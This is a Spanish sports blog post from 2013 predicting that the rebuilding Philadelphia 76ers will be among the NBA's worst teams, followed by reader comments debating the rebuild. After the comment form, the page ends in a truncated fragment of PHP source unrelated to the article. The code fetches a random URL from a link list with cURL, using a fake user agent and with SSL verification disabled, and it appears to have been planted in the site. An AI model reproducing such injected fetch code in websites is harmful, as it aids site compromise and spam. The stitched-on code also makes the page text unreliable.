Philadelphia 76ers: ¿El peor equipo de la historia?

18 de October de 2013 por Simon

Llegan malos tiempos para Philadelphia. No es un secreto ni voy a descubrir que prácticamente nadie apostaría esta temporada a que no son los últimos de la liga. El sueño que parecían vivir los aficionados de los Sixers hace exactamente un año se ha tornado en pesadilla. Parecía que por fin iban a dar el salto definitivo para luchar de verdad por el título de conferencia tras una década luchando simplemente por entrar en Play Off y no conseguir grandes resultados en las eliminatorias por el título. En la 2011-2012 (la temporada del lockout) habían “casi llegado a la final de conferencia”  pero había parecido más una casualidad que mérito de los propios Sixers. La temporada pasada tenía que ser la buena, la de dar el salto a la zona noble del Este para quedarse varios años. Lejos de cumplirse esas expectativas, nos encontramos con que su gran esperanza en aquellos tiempos se ha marchado sin vestir ni un minuto la camiseta de los Sixers y lo que es peor, sin hacer el más mínimo esfuerzo ni poner el mínimo interés por vestirla. Ni siquiera vamos a mencionar su nombre, no merece la pena. El único consuelo a principios de este verano para el aficionado de Philadelphia era su base Jrue Holiday, reciente All-Star, que mantuvo el equipo a flote toda la temporada pasada, luchando por los Play Off hasta el final de la misma. Los aficionados pensaban que Holiday podía ser un jugador sobre el que empezar un nuevo proyecto…

Nada más lejos de la realidad. El nuevo General Manager, Sam Hinkie, decidió llegar y tirar la casa entera, sin respetar siquiera los cimientos. Holiday se marchó la noche del Draft camino de los nuevos Pelicans y a cambio suyo llegó Nerlens Noel, el prometedor y lesionado pívot de la universidad de Kentucky, y una 1ª ronda de 2014 protegida TOP-5. El cambio era un claro giro del proyecto. Se apostaba por algo completamente nuevo. Se desprendían de su estrella por un proyecto de ella pero que andaba lesionado. Un hombre grande y lesionado… Tras la reciente experiencia suena casi a broma macabra para los Sixers. 

Prometo solemnemente que no quiero el número uno para los Sixers porque no  van  a competir este año ni un solo minuto pero eso no quiere decir que no entienda los motivos que han llevado a la franquicia a afrontar semejante reconstrucción. Llevaban una década luchando por los PO en tierra de nadie y cuando deciden apostar a lo grande y traerse a un jugador franquicia de los de verdad, sale lo que sale. Casi mejor dar un paso a atrás y coger impulso que seguir en la indefinición. El año que viene llegarán provenientes del draft un top 3 y seguramente un top 10 gracias a la elección de New Orleans. Unidos a Nerlens Noel, que sin lesiones era el clarísimo número 1 del Draft, y un diamante por pulir como es Michael Carter Williams,  pueden devolver a la élite a los Sixers en unas cuantas temporadas. Sin embargo, esta temporada va a ser muy dura en la ciudad del amor del fraterno pues este equipo es uno de los peores de la historia de la NBA. Lo más curioso de esta situación es que el aficionado Sixers medio parece haber aceptado de buen grado este cambio de proyecto y se muestran ilusionados con el mismo.

Hasta ahora nos hemos centrado exclusivamente en la situación global de la franquicia, pero apenas hemos hablado de quiénes son los jugadores que integran el equipo. Empecemos por el base titular, el recién llegado Michael Carter Williams, que no ha dejado indiferente a nadie. Está claro que el talento tiene pero de momento su toma de decisiones es muy mejorable lo que le hace perder un montón de balones. Además su efectividad en el tiro es, siendo generosos, mediocre.  En lo que realmente destaca MCW es en su capacidad de repartir juego gracias a una altura (1’97m) que le permite vislumbrar toda la cancha. Además consigue bastantes rebotes frente a su par dada la diferencia de altura con la mayoría de ellos y es un jugador muy ágil por lo que puede convertirse en un defensor de élite desde el primer momento a poco que ponga ganas. Este año va a tener tiempo de sobra para aprender por ensayo y error porque prácticamente va a tener galones desde el minuto uno hasta el último ya que a su entrenador no le queda otra. En el peor de los casos, será un buen asistente y excepcional defensor por lo que el puesto de base parece “bien” cubierto. El suplente de MCW puede ser casi cualquiera. Ahora mismo en plantilla tienen a Darius Morris y Tony Wroten como los más aventajados. Jugadores jóvenes de cierto talento que buscan su lugar en la liga tras haber fracaso en sus primeros años. Morris es un jugador aseado, aporta en muchos aspectos aunque de manera regular lo que hace que no encuentre su sitio. Tony Wroten llega a Sixers buscando las oportunidades que no tuvo en Memphis. Es un jugador por el que mucha gente apostaba por sus buenas condiciones físicas y su talento. Sus cualidades y defectos son en muchos casos parecidos a los de MCW: mala toma de decisiones, gran altura para ser un base, deficiente tiro a distancia… Pero el talento ahí está por lo que con minutos y confianza podría asentarse como un jugador de rotación puesto que también jugará minutos como escolta.

El puesto de escolta será, por sorpresa, para James Anderson que aportará tiro externo y “algo” de experiencia NBA. El plan inicial de los Sixers era situar a Turner en esta posición y a Young en el puesto de alero dejando a Moultrie la posición de ala-pívot pero la lesión de este último ha trastocado todos los planes y ha provocado que Anderson se cuele en el quinteto. Que este jugador sea el mejor escolta de la plantilla habla de lo floja que es. Evan Turner jugará también minutos en esta posición y dos rookies, Vander Blue y  Khalif Wyatt, pelean por un puesto en el roster final. El que se quede no disfrutará de muchos minutos y verá su rol reducido a una anotación inmediata.

En el puesto de alero el titular será Evan Turner, otrora proyecto de estrella que cada vez más se va quedando en un simple buen jugador. Turner es un jugador que hace todo más o menos bien pero que siempre te deja frío. Le falta dar un pasito más en todas las facetas para convencer. Puede ser un buen complemente pero creo que ya nadie espera que sea la estrella que todos pensábamos cuando llegó a la liga. Aún así, es con total seguridad el mejor jugador Sixers a día de hoy y debería asumir su papel como uno de los jugadores más veteranos de la plantilla. Alternará los puestos de escolta y alero dada su gran versatilidad y ha de  terminar la temporada como máximo anotador. Es lo mínimo que se le pide. Los minutos que deje se los repartirán Thaddeus Young y alguno de los rookies que luchan por un puesto en la plantilla, como Rodney Williams o Hollis Thompson.

El ala-pívot titular será Thaddeus Young, un jugador bastante completo que viene de realizar su mejor temporada siendo uno de los jugadores principales de Sixers la pasada campaña que este año tendrá  aún más galones. Su suplente principal será Arnett Moultrie en cuanto se recupere pero de momento Lavoy Allen asumirá ese papel. Buen jugador que siempre encuentra la forma de aportar al equipo aunque al fin y al cabo es un tipo bastante limitado. Lo que pasa es que en esta plantilla parece incluso un suplente top de la liga cuando no es más que un jugador de rol. Royce White es una gran incógnita. De momento está dejando buenas sensaciones en pre-temporada y se habla de que podría subirse a un avión para disputar partidos de casa. Sería una gran noticia para la liga poder disfrutar de un jugador de su talento. De momento, despacito y buena letra con él. Gani Lawal también anda por ahí buscando quedarse.

El pívot titular mientras no se recupere Noel será Spencer Hawes, un tío con bastante talento e incluso bien dotado físicamente pero al que su falta de sangre ha frenado su progresión en la liga. Como hemos comentado anteriormente, la gran esperanza de los Sixers es Nerlens Noel que está recuperándose de una importante lesión de rodilla. Si vuelve sano su impacto defensivo será inmediato pues su combinación de altura, agilidad, salto y envergadura lo convierten en un auténtico espectáculo defendiendo su canasta. Está por ver si es capaz de mantener el duelo con gente mucho más pesada y fuerte que él, aunque seguro que irá fortaleciéndose con el tiempo. En ataque no aportará mucho más que rebotes ofensivos y definición puesto que de momento está bastante lejos de ser capaz de crearse su propio tiro. Daniel Orton acaba de ser firmado para estos últimos partidos de pretemporda y podría quedarse en la plantilla hasta la recuperación de Noel. ¡Ah! Se me olvidaba que Kwame Brown forma parte también de esta plantilla. No puede ser casualidad que en una de las peores plantillas de la historia de la NBA ,aparezca el nombre de Brown de uno de los peores número 1 del Draft de la historia.

En definitiva, equipo absolutamente paupérrimo con titulares que apenas pasarían de ser suplentes en casi cualquier otro equipo, con sextos hombres que prácticamente no jugarían y con suplentes que no tendrían hueco en la liga.

Quinteto: Michael Carter-Williams, James Anderson, Evan Turner,  Thaddeus Young, Spencer Hawes.
Sexto Hombre: Tony Wroten.

Pronósticos: Ultimísimos de la liga. Menos de 15 victorias. Le pondrán voluntad pero son tan sumamente limitados que harán sonrojarse más de una vez a sus aficionados.

Dato: Salvo el lesionado Jason Richardson, que se perderá toda la temporada por lo que ya ni lo hemos nombrado, y el inefable Kwame Brown, ningún jugador llega a los 26 años de edad a día de hoy.

Comenta

13 comentarios a esta entrada

  1. pibemessi21 dice:
    #1

    Si no es el peor, sin duda está en el grupo de los peores…

      Citar

  2. Esteban dice:
    #2

    no me parece para tanto

    los bobcats fueron los peores porque eran un convinado de jugadores jovenes, viejos, lentos, y caros
    aqui estamos en un nucleo justamente joven y que en perspectiva no sera tan malo, habra que ver como hacen para ganar partidos eso si por que parece dificil

    inteligente movida la de holiday si lo de carter williams sale mediandamente bien, sino un desperdicio

    pero con noel, mcw y suponiendo a wiggins y otro top 10, en un abrir y cerrar de ojos tienen suficientes jovenes prometedores para ilusionarse a futuro

    dicho esto, tengo mis serias dudas de lo que puede aportar noel y mas aun de carter williams

      Citar

  3. Simon dice:
    #3

    Vale Esteban en perspectiva puede que tengan futuro y en verdad el año que viene se van a encontrar con 4 jovenes prometedores para reconstruir y ser una potencia en 5 o 6 años… pero si hablamos de lo q es estrictamente esta temporada y el mmomento actual de cada jugador y su nivel a dia de hoy no se me ocurre ningun equipo tan tan flojo en la historia de la NBA… aquellos bobcats se comian a estos Sixer de calle…

      Citar

  4. Denise dice:
    #4

    Pues si, el equipo nombre por nombre es el peor que he visto nunca, pero como dices, es una jugada inteligente por parte del GM.
    El año que viene van a pillar a Wiggins, Randle ó Jabari, sumale un top 15 mas Carter-Williams, Young, Noel, Turner, No es mala base ni mucho menos, y ademas el equipo no tiene contratos largos ni está hipotecado salarialmente. El año que viene incluso estarían en disposición de fichar un buen agente libre.
    Total, que el aficionado 76ers solo debe ser paciente este año, porque en teoría en 1 ó 2 años van a tener un equipo de playoffs.
    Espero que no les toque ni a Philly, ni tampoco a Utah el pick 1. La NBA debería arreglar esto del tanking y los 14 que no entran en Playoffs deberían tener las mismas probabilidades de llevarse tanto el pick 1 como el 14, asi se incentivaba a seguir luchando por playoffs hasta el ultimo dia.

      Citar

  5. rumbero dice:
    #5

    Yo ayer tuve la brillante idea de verlos un rato contra los Bobcats (más que nada porque era a una hora decente) y telita. Jugaron sin Turner, Young y Hawes y fue un despropósito. Creo que tardaron como 6 minutos en meter la primera canasta y lo quité antes de acabar la primera parte y palmaban por 30. Sin estos tres son MCW (con lo bueno y lo malo que eso conlleva) y los fogonazos de Wroten (con lo bueno y malo que eso conlleva). Las van a pasar canutísimas.

      Citar

  6. Esteban dice:
    #6

    rumbero: , pero como dices, es una jugada inteligente por parte del GM.

    si no se nombra en el analisis a wroten que ha sido al meos estadisticamente el mejor o la mayor sorpresa del equipo

    se les ha ido la mano con la idea de ganar en lo profundo del draft, tener a turner y yougn como jugadores insignia, cuando toda su carrera apenas han logrado ser titulares en esta misma franquicia, es casi vergonzoso

    si a eso se le suma q su rookie mcw no ha jugado ni mostrado practicamente nada en la pretemporada y noel quiza ni juege, madre, mucho estomago tendran que tener sus aficionados

      Citar

  7. TheDeerHunter dice:
    #7

    No comparto tanto pesimismo. Se jugaron la reconstrucción con Bynum y salió cruz. No creo que se hayan movido mal ante el draft del año que viene que se supone va a ser tan bueno. En esta línea comprendo perfectamente el movimiento de Holliday. No puedes mantener un jugador all-star en una temporada sin objetivos… y tampoco le veo perfil de jugador franquicia, sin ánimo de menospreciar.

    No niego que son el peor equipo de la liga sobre el papel, pero si Noel vuelve a tiempo y es lo que se dice de él en ningún caso podemos hablar de uno de los peores equipos de la historia.

      Citar

  8. Melo15 dice:
    #8

    Pues a mi me parece bien lo que han hecho los Sixers. En la NBA no se va a medias tintas, el Este este año se ha puesto bastante crudo y los Sixers aun con Holiday no tendrian opciones de clasificarse a playoffs.
    En cambio ahora disponen de dos promesas,dos buenos jugadores y ademas disponen de 2 elecciones Top-10 en el que se supone el mejor draft de la decada.

      Citar

  9. Simon dice:
    #9

    Si yo lo primero que digo en el artículo esque entiendo los motivos y que además están en una inmejorable situación para reconstruir. El balance del draft fue buenísimo cogiendo lo mejor que había disponible e incluso parece que estuvieran buscando directamente acompañantes en lugar de estrellas pues MCW y Noel me parecen muy buenos jugadores a medio plazo para acompañar a la estrella que llegará supuestamente el año que viene que además lo hará con otra semi-estrella al lado. y además con mucho margen salarial, lo cual tampoco hay que olvidarlo. Pero a dia de hoy lo q es para esta temporada tenemos un equipo paupérrimo, MCW le falta mucho para ser un base consistente. Evan Turner no pasaría de titularcillo en otro equipo. Young un suplente decente de 15/20 minutos en cualquier otra plantilla. Y Hawes pues bueno… el chaval no lo hace mal pero no lo veo de titular en ningún equipo de la liga. Y Noel es una autentica incognita que personalmente creo que al menos como una máquina defensiva va a funcionar… en el futuro miraremos este equipo y diremos que quizás no eran tan malo pq sus jugadores aun tienen futuro pero lo que es el nivel actual para este mismo año no me cabe duda que son uno de los peores equipos de la historia y su balance de victorias así lo reflejará a final de temporada.

      Citar

  10. Denise dice:
    #10

    Simon:
    Young un suplente decente de 15/20 minutos en cualquier otra plantilla.

    Pues a mi Thadeus Young me parece un muy buen jugador, un gran todoterreno. No lo veo como un simple 8º ó 9º jugador de un equipo. Para mi sería un 6º hombre cojonudo en cualquier franquicia y un más que decente titular en la mitad de ellas.

      Citar

  11. r_miller dice:
    #11

    Van a ganar 9 partidos, contra los bobcats, orlando, phoenix, boston y algun equipo grande tipo clippers que ese dia se confie

      Citar

  12. Denise dice:
    #12

    r_miller:
    Van a ganar 9 partidos, contra los bobcats, orlando, phoenix, boston y algun equipo grande tipo clippers que ese dia se confie

    Estoy contigo, no creo que ganen más de 10 partidos, pero esos equipos que nombras, salvo Phoenix, en condiciones normales se cepillan a los 76ers con los ojos cerrados.
    Creo que los 76ers solo van a ganar en ocasiones cuando el calendario les favorezca y por ejemplo lleven 3 dias descansados y reciban a un equipo que lleve 3-4 partidos en 7 dias con viajes incluidos. Ó cuando el otro equipo venga con un puñado de lesiones.

      Citar

  13. franitis dice:
    #13

    Tal vez me tiren los colores pero, ¿Boston por debajo de estos 76ers?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>